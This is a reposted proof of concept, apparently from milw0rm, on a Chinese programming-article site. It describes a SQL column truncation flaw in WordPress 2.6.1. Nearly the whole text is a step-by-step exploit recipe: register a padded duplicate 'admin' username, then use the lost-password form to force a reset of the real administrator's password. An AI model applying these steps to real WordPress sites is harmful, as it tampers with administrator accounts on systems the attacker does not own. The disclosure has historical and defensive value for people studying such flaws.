欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

WordPress 2.6.1 SQL Column Truncation Vulnerability

程序员文章站 2022-05-24 19:16:46
用wordpress的要注意了 # WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC) # # found by irk4z[at]yahoo.pl # homepage: http://irk4z.wordpress.com/ # ... 08-10-08...
用wordpress的要注意了 # wordpress 2.6.1 sql column truncation vulnerability (poc)
#
# found by irk4z[at]yahoo.pl
# homepage: http://irk4z.wordpress.com/
#
# this is not critical vuln [;
#
# first, read this discovery:
# http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/
#
# in this hack we can remote change admin password, if registration enabled
#
# greets: stefan esser, lukasz pilorz, condemned, tbh, sid.psycho, str0ke and all fiends 1. go to url: server.com/wp-login.php?action=register 2. register as: login: admin x
email: your email^ admin[55 space chars]x now, we have duplicated 'admin' account in database 3. go to url: server.com/wp-login.php?action=lostpassword 4. write your email into field and submit this form 5. check your email and go to reset confirmation link 6. admin's password changed, but new password will be send to correct admin email ;/ # milw0rm.com